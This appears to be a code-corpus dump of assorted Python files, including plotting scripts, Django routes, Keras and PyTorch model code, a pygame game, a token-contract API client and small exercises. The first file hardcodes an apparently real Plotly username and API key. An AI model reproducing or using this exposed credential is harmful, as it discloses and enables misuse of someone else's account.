{"seq_id":"39786284","text":"\n#%% Plotly\nimport plotly.plotly as py\npy.plotly.tools.set_credentials_file(username='notbatman', api_key='1hy2cho61mYO4ly5R9Za')\nimport plotly.graph_objs as go\n\n#%% Core imports\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#%% Seaborn\n\nsns.set(style=\"white\", rc={\"axes.facecolor\": (0, 0, 0, 0)})\n\n\n\n\n#%% DAY NUMBER PLOT\nax=cat_counts_daynum.T.iloc[:,:10].plot(kind='line',subplots=False,figsize=PORTRAIT_A3,sharex=True,sharey=True,rot=90)\n\nax.legend(loc='upper center', bbox_to_anchor=(1, 1), ncol=1, fancybox=True, shadow=True)\n\nax.set_title(\"ASDF\")\ni+=1\n\n\n#%% DAY NUMBER PLOT ZOOM\nax=cat_counts_daynum.T.iloc[0:31,:10].plot(kind='line',subplots=False,figsize=PORTRAIT_A3,sharex=True,sharey=True,rot=90)\nax.legend(loc='upper center', bbox_to_anchor=(1, 1), ncol=1, fancybox=True, shadow=True)\nax.set_title(\"ASDF\")\ni+=1\n\n\n\n\n#%% Example \n# Create the data\nrs = np.random.RandomState(1979)\nx = rs.randn(500)\ng = np.tile(list(\"ABCDEFGHIJ\"), 50)\ndf = pd.DataFrame(dict(x=x, g=g))\nm = df.g.map(ord)\ndf[\"x\"] += m\n\n# Initialize the FacetGrid object\npal = sns.cubehelix_palette(10, rot=-.25, light=.7)\ng = sns.FacetGrid(df, row=\"g\", hue=\"g\", aspect=15, size=.5, palette=pal)\n\n# Draw the densities in a few steps\ng.map(sns.kdeplot, \"x\", clip_on=False, shade=True, alpha=1, lw=1.5, bw=.2)\ng.map(sns.kdeplot, \"x\", clip_on=False, color=\"w\", lw=2, bw=.2)\ng.map(plt.axhline, y=0, lw=2, clip_on=False)\n\n# Define and use a simple function to label the plot in axes coordinates\ndef label(x, color, label):\n    ax = plt.gca()\n    ax.text(0, .2, label, fontweight=\"bold\", color=color, \n            ha=\"left\", va=\"center\", transform=ax.transAxes)\n\ng.map(label, \"x\")\n\n# Set the subplots to overlap\ng.fig.subplots_adjust(hspace=-.25)\n\n# Remove axes details 
that don't play will with overlap\ng.set_titles(\"\")\ng.set(yticks=[])\ng.despine(bottom=True, left=True)\n","sub_path":"03 scripts/00 Superceded/02 Plotting counts OLD.py","file_name":"02 Plotting counts OLD.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"268025905","text":"from django.urls import path\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n path('',views.IndexView, name='index'),\n path('bbsr/', views.BbsrView, name='bbsr'),\n path('agra/', views.AgraView, name='agra'),\n path('bbsr/market/', views.BbsrMarket, name='bbsrmarket'),\n path('bbsr/food/', views.BbsrFood, name='bbsrfood'),\n path('bbsr/places/', views.BbsrPlaces, name='bbsrplaces'),\n path('bbsr/Weather/', views.BbsrWeather, name='bbsrweather'),\n path('bbsr/Crime/', views.BbsrCrime, name='bbsrcrime'),\n path('agra/market/', views.AgraMarket, name='agramarket'),\n path('agra/food/', views.AgraFood, name='agrafood'),\n path('agra/places/', views.AgraPlaces, name='agraplaces'),\n path('agra/Weather/', views.AgraWeather, name='agraweather'),\n path('agra/Crime/', views.AgraCrime, name='agracrime')\n]\n","sub_path":"analyzer/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"422928846","text":"import os\r\nfrom unet7 import unet\r\nfrom keras.models import Sequential\r\nfrom data_generator import DataGenerator\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\n\r\ndef fill_infos(train_dir, validation_dir):\r\n partition = { 'train': [], 'validation' : [] }\r\n labels = { }\r\n\r\n train_image_names = os.listdir(train_dir)\r\n train_image_names = [img_name for img_name in train_image_names if img_name.endswith('.jpg')] \r\n partition['train'].extend(train_image_names)\r\n\r\n validation_image_names = os.listdir(validation_dir)\r\n validation_image_names = [img_name for img_name in validation_image_names if img_name.endswith('.jpg')] \r\n partition['validation'].extend(validation_image_names)\r\n\r\n all_image_names = partition['train'].copy()\r\n all_image_names.extend(partition['validation'])\r\n for img_name in all_image_names:\r\n labels[img_name] = img_name[:-4] + '-colormask.png'\r\n\r\n return partition, labels\r\n\r\n\r\n\r\n\r\n\r\n# Parameters\r\nparams = {'dim': (512,512,3),\r\n 'batch_size': 4,\r\n 'shuffle': True}\r\n\r\ntraining_dir = 'UnetDataset_v2' #\r\nmodel_name = \"unet7\"\r\n\r\nfpath = \"check_points/\" + model_name + \"/\" + training_dir + \"/\" + model_name + \".hdf5\"\r\npartition, labels = fill_infos(training_dir + '/train', training_dir + '/validation')\r\ntraining_generator = DataGenerator(training_dir, 'train', partition['train'], labels, **params)\r\nvalidation_generator = DataGenerator(training_dir, 'validation', partition['validation'], labels, **params)\r\n\r\n#fpath = \"check_points/small_unet_v2/UnetDataset_v4/\" + training_dir + \"_small_UNet_v2_{epoch:02d}-{val_accuracy:.2f}_100.hdf5\"\r\n\r\n\r\ncheck_point = ModelCheckpoint(fpath, monitor='val_accuracy',\r\n verbose=2, save_best_only=True, mode='max')\r\nmodel = unet(input_size=params['dim']) \r\n\r\nmodel.fit_generator(generator=training_generator,\r\n validation_data=validation_generator,\r\n callbacks=[check_point],\r\n epochs=20, verbose=1,\r\n use_multiprocessing=True, workers=12)\r\n\r\n\r\nfrom numeric_test import jaccard_general\r\n\r\njaccard_general(model, training_dir + '/train', 
0, 512, None)\r\njaccard_general(model, training_dir + '/test', 0, 512, None)\r\njaccard_general(model, training_dir + '/validation', 0, 512, None) \r\n\r\n","sub_path":"UNet/Model/UnetCombinations/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646005317","text":"import requests\nimport sys\n\nif len(sys.argv) > 1:\n port = sys.argv[1]\nelse:\n port = '8000'\n \nhost = 'http://greenlight.dyndns-home.com' \n\nAssetCode = None \n\n# Needs Ubuntu Firewall opened\n\nurl = '%s:%s/activateshcapi/covid19greenlight/dlypka/UseExistingWallets' % (host, port)\nr = requests.get(url)\nprint(str(r.status_code))\nprint('--End of call to activateshcapi()--\\n\\n')\n \nis_createshcsmartcontract_enabled = False\nif is_createshcsmartcontract_enabled:\n url = '%s:%s/createshcsmartcontract' % (host, port)\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in'})\n print(str(r.status_code))\n print('--End of call to createshcsmartcontract()--\\n\\n')\n #input('Press any key to Terminate:')\n #exit(0) \n \n\nis_shareholder_post_enabled = False\nif is_shareholder_post_enabled: \n url = '%s:%s/shareholder' % (host, port)\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', 'shareholder_name': 'Warren Buffet', 'shareholder_shortname': 'wbuffet'})\n print(str(r.status_code))\n print('--End of call to shareholder()--\\n\\n')\n #input('Press any key to Terminate:')\n #exit(0)\n \n \nis_asset_post_enabled = True\nif is_asset_post_enabled: \n url = '%s:%s/asset' % (host, port)\n # have to include the contents of\n # asset_payload_filepath = base_contract_json_path + '/covid19greenlight_asset_payload_SHC.json'\n \"\"\"\n {\"Ticker\": \"GRNLT\", \"Description\": \"COVID19Greenlight.org\"}\n \"\"\" \n # covid19greenlight_asset_definition_SHC.json\n \"\"\"\n {\"TransfersPermitted\": true, \"EnforcementOrdersPermitted\": true, \"TradeRestrictions\": [\"AUS\"], \"VotingRights\": true, \"VoteMultiplier\": 1, \"AdministrationProposal\": true, \"HolderProposal\": true, \"AssetModificationGovernance\": 1, \"TokenQty\": 256000, \"AssetType\": \"SHC\", \"AssetPayload\": \"0a0547524e4c541a15434f5649443139477265656e6c696768742e6f7267\"}\n \"\"\"\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', \n 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', \n 'shareholder_name': 'Warren Buffet', \n 'shareholder_shortname': 'wbuffet', \n 'asset_payload': {\"Ticker\": \"GRNLT\", \"Description\": \"COVID19Greenlight.org\"},\n 'asset_definition': {\"TransfersPermitted\": True, \"EnforcementOrdersPermitted\": True, \"TradeRestrictions\": [\"AUS\"], \"VotingRights\": True, \"VoteMultiplier\": 1, \"AdministrationProposal\": True, \"HolderProposal\": True, \"AssetModificationGovernance\": 1, \"TokenQty\": 256000, \"AssetType\": \"SHC\"}},\n )\n # See response properties of r in https://www.w3schools.com/python/ref_requests_response.asp\n print(str(r.status_code))\n responsejson = r.json()\n AssetCode = responsejson['AssetCode']\n print('AssetCode=%s' % AssetCode)\n print('--End of call to asset()--\\n\\n')\n input('Press any key to Terminate:')\n exit(0) \n\nis_airdrop_enabled = True\nif is_airdrop_enabled:\n if not AssetCode:\n print('Missing AssetCode value. 
Please request /asset first.')\n input('Press any key to Terminate:')\n exit(1)\n url = '%s:%s/airdrop' % (host, port)\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', 'AssetCode': AssetCode, 'shareholder_name': 'Warren Buffet', 'shareholder_shortname': 'wbuffet', 'shareholder_moniker': 'wbuffet_13f4SpiGcvPa2ko6noeTj8fFKTJ8M2So6f'})\n print(str(r.status_code))\n print('--End of call to shareholder()--\\n\\n')\n input('Press any key to Terminate:')\n exit(0)\n\n\n","sub_path":"testapi.py","file_name":"testapi.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"298151980","text":"import spacy\n\n# Load English tokenizer, tagger, parser, NER and word vectors\nnlp = spacy.load('en')\n\n# Process a document, of any size\ntext = open('war_and_peace.txt').read()\ndoc = nlp(text)\n\n# Hook in your own deep learning models\nsimilarity_model = load_my_neural_network()\n\n\ndef install_similarity(doc):\n doc.user_hooks['similarity'] = similarity_model\n\n\nnlp.pipeline.append(install_similarity)\n\ndoc1 = nlp(u'the fries were gross')\ndoc2 = nlp(u'worst fries ever')\ndoc1.similarity(doc2)\n","sub_path":"All/Demo_Spacy.py","file_name":"Demo_Spacy.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356198535","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^users/register$', views.register, name='register'),\n url(r'^users/login$', views.login, name='login'),\n url(r'^users/home$', views.users_home, name='users_home'),\n url(r'^users/(?P\\w+)$', views.show_user, name='show_user'),\n url(r'^books$', views.books, name='books'),\n url(r'^books/add$', views.add_book, name='add_book'),\n url(r'^books/(?P\\w+)$', views.books_home, name=\"books_home\"),\n url(r'^books/review/(?P\\w+)$', views.review, name='review'),\n url(r'^logout', views.logout, name='logout')\n\n]\n","sub_path":"apps/bookreview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119986176","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom torch.nn import Conv2d as NNConv2d\nfrom torch.nn.modules.conv import conv2d_forward\nfrom torch.quantization.QConfig import default_qat_qconfig\n\nclass Conv2d(NNConv2d):\n r\"\"\"\n A Conv2d module attached with FakeQuantize modules for both output\n activation and weight, used for quantization aware training.\n\n We adopt the same interface as `torch.nn.Conv2d`, please see\n https://pytorch.org/docs/stable/nn.html?highlight=conv2d#torch.nn.Conv2d\n for documentation.\n\n Similar to `torch.nn.Conv2d`, with FakeQuantize modules initialized to\n default.\n\n Attributes:\n observer: fake quant module for output activation, it's called observer\n to align with post training flow\n weight_fake_quant: fake quant module for weight\n\n Examples::\n\n >>> # With square kernels and equal stride\n >>> m = nn.qat.Conv2d(16, 33, 3, stride=2)\n >>> # non-square kernels and unequal stride and with padding\n >>> m = nn.qat.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))\n >>> # non-square kernels and unequal stride and with padding and dilation\n >>> m = nn.qat.Conv2d(16, 33, (3, 5), 
stride=(2, 1), padding=(4, 2), dilation=(3, 1))\n        >>> input = torch.randn(20, 16, 50, 100)\n        >>> output = m(input)\n    \"\"\"\n\n    __FLOAT_MODULE__ = NNConv2d  # the float module class this QAT module replaces\n\n    def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n                 padding=0, dilation=1, groups=1,\n                 bias=True, padding_mode='zeros',\n                 activation_fake_quant=default_qat_qconfig.activation(),\n                 weight_fake_quant=default_qat_qconfig.weight()):\n        super(Conv2d, self).__init__(in_channels, out_channels, kernel_size,\n                                     stride=stride, padding=padding, dilation=dilation,\n                                     groups=groups, bias=bias, padding_mode=padding_mode)\n        self.observer = activation_fake_quant\n        self.weight_fake_quant = weight_fake_quant\n\n    def forward(self, input):\n        return self.observer(conv2d_forward(input, self.padding_mode, self.padding,\n                                            self.weight_fake_quant(self.weight), self.bias,\n                                            self.stride, self.dilation, self.groups))\n\n    @classmethod\n    def from_float(cls, mod, qconfig=None):\n        r\"\"\"Create a qat module from a float module or qparams_dict\n\n        Args: `mod` a float module, either produced by torch.quantization utilities\n            or directly from user\n        \"\"\"\n        assert type(mod) == cls.__FLOAT_MODULE__, ' nnq.' + cls.__name__ + '.from_float only works for ' + \\\n            cls.__FLOAT_MODULE__.__name__\n        if not qconfig:\n            assert hasattr(mod, 'qconfig'), 'Input float module must have qconfig defined'\n            assert mod.qconfig, 'Input float module must have a valid qconfig'\n            qconfig = mod.qconfig\n        qat_conv = cls(mod.in_channels, mod.out_channels, mod.kernel_size,\n                       stride=mod.stride, padding=mod.padding, dilation=mod.dilation,\n                       groups=mod.groups, bias=mod.bias is not None,\n                       padding_mode=mod.padding_mode,\n                       activation_fake_quant=qconfig.activation(),\n                       weight_fake_quant=qconfig.weight())\n        qat_conv.weight = mod.weight\n        qat_conv.bias = mod.bias\n        return qat_conv\n","sub_path":"torch/nn/qat/modules/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"37717122","text":"import numpy as np\r\nfrom misc import spectral as sp\r\n\r\nclass b_elem():\r\n    def __init__(self, I=[-1.0, 1.0], n=1, bc=[], Id=None):\r\n        self.I = np.array(I)\r\n        self.n = n\r\n        self.bc = bc\r\n        if Id == None:\r\n            self.Id = np.eye(n)\r\n        else:\r\n            self.Id = Id\r\n        self.D = sp.chebDiff(self.n).dot(self.rp_eval())\r\n\r\n        if I[0] == -np.inf:\r\n            self.map = lambda x: -((1.0 - x) / (1.0 + x) - I[1])\r\n            self.imap = lambda x: (x + 1.0 - I[1])/(-x + I[1] + 1.0)\r\n\r\n            self.dmap = lambda x: (1.0 + x) ** 2.0 / 2\r\n            self.idmap = lambda x: 2/(1 + x)**2\r\n            return\r\n\r\n        if I[1] == np.inf:\r\n            self.map = lambda x: ((1.0 + x) / (1.0 - x) + I[0])\r\n            self.imap = lambda x: (-x + I[0] + 1.0) / (-x + I[0] - 1.0)\r\n\r\n            self.dmap = lambda x: (x - 1) ** 2.0 / 2.0\r\n            self.idmap = lambda x: 2.0/(x - 1) ** 2.0\r\n            return\r\n\r\n        a = I[0]; b = I[1]\r\n        q = (b - a) / 2.0; p = (b + a) / 2.0\r\n        self.map = lambda x: (q * x + p)\r\n        self.imap = lambda x: (x - p)/q\r\n\r\n        self.dmap = lambda x: 1.0 / (q + x * 0)\r\n        self.idmap = lambda x: q + 0\r\n\r\n    def rp_eval(self):\r\n        Id = self.Id\r\n        for it in self.bc:\r\n            Id[it[0], it[0]] = it[1]\r\n        return Id\r\n\r\n    def p_eval(self, x): ## return shape: (*x.shape, deg of element)\r\n        x = np.atleast_1d(x)\r\n        P = self.rp_eval()\r\n        if x.size == 1:\r\n            if x[0] == self.I[0]:\r\n                return np.array([P[0, :]])\r\n            if x[0] == self.I[-1]:\r\n                return np.array([P[-1, :]])\r\n        # print('oops')\r\n        xs = self.imap(x)\r\n        res = sp.bary(P, xs)\r\n        return res\r\n\r\n    def xs(self):\r\n        x = 
sp.chebNodes(self.n)\r\n        x = self.map(x)\r\n        return x\r\n\r\n    def new_xs(self):\r\n        x = sp.chebNodes(self.n)\r\n        mx = self.imap\r\n\r\n        return x, mx\r\n\r\n    def dp_eval(self, x): ## return shape: (*x.shape, deg of element)\r\n        x = np.atleast_1d(x)\r\n        P = self.D\r\n        if x.size == 1:\r\n            if x[0] == self.I[0]:\r\n                return self.dmap(-1)*np.array([P[0, :]])\r\n            if x[0] == self.I[-1]:\r\n                return self.dmap(1)*np.array([P[-1, :]])\r\n        xs = self.imap(x)\r\n        res = sp.bary(f=P, x=xs)*np.reshape(self.dmap(xs), (*x.shape, 1))\r\n        return res\r\n    def gen_func(self):\r\n        return lambda x: self.p_eval(x)\r\n    def gen_funcd(self):\r\n        return lambda x: self.dp_eval(x)\r\n\r\n    def __call__(self, x):\r\n        return self.p_eval(x)\r\n    def d(self, x):\r\n        return self.dp_eval(x)","sub_path":"FEM/elem/basis_elem.py","file_name":"basis_elem.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"56577082","text":"#ej 1.4\ndef factorial(n):\n    \"\"\"Devuelve el factorial de n\"\"\"\n    factorial = 1\n    for i in range(1, n + 1): \n        factorial *= i\n\n    return factorial\n\ninputFactorial = int(input('Ingrese para factorial: '))\nfunction = factorial(inputFactorial)\nprint(function)\n\nfor i in range(5):\n    valor = int(input('Ingrese un valor: '))\n    print(i + 1, valor, factorial(valor))","sub_path":"practica/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"180934903","text":"import numpy\r\nimport pygame\r\nimport math\r\nimport os\r\nimport time\r\nimport random\r\n\r\nclass Game():\r\n    def __init__(self, width, height, speed = 1, grid = 5):\r\n\r\n        os.environ['SDL_AUDIODRIVER'] = 'dummy'\r\n        pygame.init()\r\n\r\n        self.clock = pygame.time.Clock()\r\n        self.width = width\r\n        self.height = height\r\n        self.speed = speed\r\n        self.grid = grid\r\n\r\n        self.RED = (255,0,0)\r\n        self.GREEN = (0,255,0)\r\n        self.BLUE = (0,0,255)\r\n        self.WHITE = (255,255,255)\r\n        self.BLACK = (0,0,0)\r\n\r\n\r\n\r\n    def resetGame(self):\r\n        self.window = pygame.display.set_mode((self.width, self.height))\r\n        pygame.display.set_caption(\"AI\")\r\n\r\n        self.running = True\r\n        self.score = 0\r\n        self.gameOver = False\r\n        self.playerX = self.width//2 - self.grid*10\r\n        self.playerY = self.height - self.grid*10\r\n        self.resetEnemy()\r\n        self.resetFood()\r\n        self.vel = 10\r\n\r\n    def refresh(self):\r\n        # self.clock.tick()\r\n        pygame.time.delay(30)\r\n        self.window.fill(self.WHITE)\r\n\r\n        self.draw()\r\n        pygame.display.update()\r\n\r\n\r\n    def draw(self):\r\n        # draw the player\r\n        pygame.draw.rect(self.window, self.BLUE, (self.playerX, self.playerY, self.grid*20, self.grid*3))\r\n\r\n        # draw enemy\r\n        # pygame.draw.rect(self.window, self.RED, (self.enemyX, self.enemyY, self.grid*5, self.grid*5))\r\n        \r\n        # draw food\r\n        pygame.draw.rect(self.window, self.GREEN, (self.foodX, self.foodY, self.grid*5, self.grid*5))\r\n        \r\n        font = pygame.font.SysFont('Comic Sans MS', 25)\r\n        scoreText = font.render(\"Score: \" + str(self.score//100), True, self.BLACK)\r\n        self.window.blit(scoreText, (25,25))\r\n        pass\r\n\r\n\r\n    def runGame(self):\r\n        # pick up food\r\n        if self.foodX in range(self.playerX - self.grid*5, self.playerX + self.grid*20) and \\\r\n            self.foodY in range(self.playerY - self.grid*5, self.playerY + self.grid*3):\r\n            self.resetFood()\r\n            self.score += 100\r\n\r\n\r\n    def handleAction(self, action):\r\n        if (action == 'QUIT'):\r\n            self.running = 
False\r\n\r\n        if action == 'RESTART':\r\n            self.resetGame()\r\n\r\n\r\n        # handle player movement\r\n        if action == 0:\r\n            self.playerX -= self.vel\r\n            if self.playerX < 0:\r\n                self.playerX = 0\r\n\r\n        if action == 1:\r\n            self.playerX += self.vel\r\n            if self.playerX > self.width - self.grid*20:\r\n                self.playerX = self.width - self.grid*20\r\n\r\n        # handle enemy movement (straight down)\r\n        # self.enemyY += self.vel\r\n        # if (self.enemyY > self.height):\r\n        #     self.resetEnemy()\r\n\r\n        # handles food (straight down)\r\n        self.foodY += self.vel\r\n        if (self.foodY > self.height):\r\n            # DIE!\r\n            # self.score -= 10\r\n            self.running = False\r\n            self.resetFood()\r\n\r\n    def handleEvent(self, event):\r\n        if event.type == pygame.QUIT:\r\n            self.running = False\r\n\r\n    def resetEnemy(self):\r\n        self.enemyX = random.randint(0,self.width//self.grid - 5)*self.grid\r\n        self.enemyY = self.grid*5\r\n\r\n\r\n\r\n    def resetFood(self):\r\n        self.foodX = random.randint(0,self.width//self.grid - 5)*self.grid\r\n        # self.foodX = 400\r\n        self.foodY = self.grid*5\r\n\r\n\r\n    def getObservation(self):\r\n        inline = False\r\n        if self.foodX in range(self.playerX - 5*self.grid, self.playerX + self.grid*20):\r\n            inline = True\r\n\r\n        return [self.playerX - self.foodX]","sub_path":"ai/aiGame.py","file_name":"aiGame.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"324421417","text":"import sys\nsys.path.append(\"../\")\n\nfrom importlib import import_module\n\nclass DatasetFactory():\n\n    dataset_path = {\n        \"freesound_dataset\": \"shabda.data.dataset.freesound_dataset\",\n        \"speech_commands_v0_02\" : \"shabda.data.dataset.speech_commands_v0_02\"\n    }\n\n    datasets = {\n        \"freesound_dataset\": \"FreeSoundDataset\",\n        \"speech_commands_v0_02\" : \"SpeechCommandsV002\"\n    }\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def _get_dataset(name):\n        try:\n            dataset = getattr(import_module(DatasetFactory.dataset_path[name]), DatasetFactory.datasets[name])\n        except KeyError:\n            raise NotImplementedError(\"Given dataset file name not found: {}\".format(name))\n        # Return the dataset class\n        return dataset\n\n    @staticmethod\n    def get(dataset_name):\n        dataset = DatasetFactory._get_dataset(dataset_name)\n        return dataset\n\n\n","sub_path":"src/main/python/shabda/data/dataset/internal/dataset_factory.py","file_name":"dataset_factory.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"62628145","text":"#Reusable basic support functions.\n\n\n#Decode string sent by a client into the filter input array.\ndef decode_filters_string(filters_string):\n    #'ab&cd&ef&' -> ['ab', 'cd', 'ef']\n    items = filters_string.split('&')\n    return [x for x in items if len(x) > 0]\n\n\n#Filter player data according to filter input.\ndef filter_data(player_data, filter_input, tankopedia):\n    filtered_player_data = []\n    for tank in player_data:\n        #Calling tankopedia tank dictionary.\n        tp_dict = tankopedia.get(str(tank['tank_id']))\n        if tp_dict:\n            #Filtering.\n            if tp_dict['type'] in filter_input and str(tp_dict['tier']) in filter_input:\n                filtered_player_data.append(tank)\n    return filtered_player_data\n\n\n#Subtract old_data from new_data.\ndef find_difference(old_data, new_data):\n    #Making a copy to prevent changing the input.\n    old_data = old_data[:]\n    #Deleting tanks from 'old_data' that were not played.\n    for new_tank in new_data:\n        for s, old_tank in enumerate(old_data):\n            if 
new_tank['tank_id'] == old_tank['tank_id'] and new_tank['battles'] == old_tank['battles']:\n old_data.pop(s)\n break\n\n #Return if empty.\n if any(old_data) == False:\n return []\n\n #Deleting tanks from 'new_data' that aren't in filtered 'old_data'.\n old_tank_ids = [tank['tank_id'] for tank in old_data]\n temp_list = []\n for new_tank in new_data:\n if new_tank['tank_id'] in old_tank_ids:\n temp_list.append(new_tank)\n new_data = temp_list\n\n #Substracting difference.\n slice_data = []\n for old_tank in old_data:\n for new_tank in new_data:\n if old_tank['tank_id'] == new_tank['tank_id']:\n #Iterating through tank dictionary.\n temp_dict = {}\n for key, value in new_tank.items():\n temp_dict[key] = new_tank[key] - old_tank[key]\n #Preserving 'tank_id'\n temp_dict['tank_id'] = new_tank['tank_id']\n #Appending to output list.\n slice_data.append(temp_dict)\n break\n\n return slice_data\n","sub_path":"web/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111931498","text":"import json\nimport os\nfrom itertools import permutations\nfrom pathlib import Path\n\n\ndef search(JsonData, query, defaultQuery='i5 i7 Ryzen'):\n \"\"\"\n :param JsonData: json\n :param query: query\n :return: list\n \"\"\"\n\n query = query.split(' ')\n flatten, result, finalUnique = {}, {}, []\n final = []\n\n k = [comb for x in range(1, len(query) + 1) for comb in list(permutations(query, x))]\n\n # helper\n uniq = list(set(tuple(frozenset(x)) for x in set(k)))\n\n [finalUnique.append(\" \".join(elem).strip()) for elem in uniq]\n\n if all([len(x) >= 0 for x in finalUnique]):\n for elem in finalUnique:\n arr = []\n for data in JsonData:\n if elem.lower() in str(data['name']).lower():\n arr.append(data['name'])\n\n if len(arr) > 0:\n result.update({len(arr): arr})\n\n sort = sorted(result.items())\n\n for count, data in sort:\n for x in data:\n flatten.update({x: None})\n\n for x in flatten.keys():\n for y in JsonData:\n if x == y['name']:\n final.append(y)\n\n return final\n else:\n return search(JsonData=JsonData, query='')\n\n\nif __name__ == \"__main__\":\n\n currentPath = Path(__file__).parent.parent.parent\n storage = os.path.join(currentPath, \"storage\")\n\n with open(file=os.path.join(storage, 'powersupply.json')) as file:\n jsonData = json.loads(file.read())\n\n newData = []\n\n res =search(JsonData=jsonData, query='Antec')\n\n for x in res:\n for y in x.items():\n print(y)","sub_path":"backend/api/Controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426908662","text":"import helper\nimport tensorflow as tf\nimport pandas as pd\nfrom keras.models import Sequential, Model,load_model\nfrom keras.layers import Convolution2D,Cropping2D,Dropout,MaxPooling2D,Lambda\nfrom keras.layers.core import Dense,Activation,Flatten\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import TensorBoard\nimport matplotlib.pyplot as plt\n\n\n\n\ndef save_model(model,name=\"model.h5\"):\n print(\"Saving Model ...\")\n model.save(name)\n\n\ndef create_model():\n model = Sequential()\n\n model.add(Convolution2D(16, 3, 3, input_shape=(32, 128, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Convolution2D(32, 3, 3, activation='relu'))\n 
model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Convolution2D(64, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n model.add(Dense(500, activation='relu'))\n model.add(Dropout(.5))\n model.add(Dense(100, activation='relu'))\n model.add(Dropout(.25))\n model.add(Dense(20, activation='relu'))\n model.add(Dense(1))\n adam = Adam(lr=0.0001) # Use adam optimizer with a learning rate of 0.001\n model.compile(optimizer=adam, loss='mean_squared_error')\n\n return model\n\ndef train():\n print(\"Loading data ...\")\n df = helper.read_data()\n # Follow Paleto's principle for splitting training and validation data\n print(\"Splitting data ...\")\n df_train, df_valid = train_test_split(df, test_size=0.2)\n\n print(\"Creating model ...\")\n model = create_model()\n # Train the model\n #samples_per_epoch = (20000//128)*128\n print(\"Training model ...\")\n tbCallback = TensorBoard(log_dir='./logs', histogram_freq=0, write_graph=True, write_images=True)\n history_object = model.fit_generator(\n helper.data_generator(df_train,training=True),\n samples_per_epoch=len(df_train),\n nb_epoch=5,\n validation_data=helper.data_generator(df_valid,training=False),\n nb_val_samples=len(df_valid), callbacks=[tbCallback])\n\n save_model(model)\n print(\"Done ... :)\")\n print(\"visualizing ...\")\n print(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\n plt.plot(history_object.history['loss'])\n plt.plot(history_object.history['val_loss'])\n plt.title('model mean squared error loss')\n plt.ylabel('mean squared error loss')\n plt.xlabel('epoch')\n plt.legend(['training set', 'validation set'], loc='upper right')\n plt.show()\n\n\nif __name__ == \"__main__\" :\n train()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261042450","text":"# solution 1\nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n extra = [None]*len(nums)\n for i in range(len(nums)):\n extra[(i+k) % len(nums)] = nums[i]\n\n for i in range(len(nums)):\n nums[i] = extra[i]\n\n#solution 2 \nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def reverse(arr,start,end):\n while start= NUM_TO_AUGMENT:\n break\n xtas.append(x_aug[0])\n num_aug+=1\n\ndatagen.fit(X_train)\n\n# OHE\nY_train = np_utils.to_categorical(y_train, NB_CLASSES)\nY_test = np_utils.to_categorical(y_test, 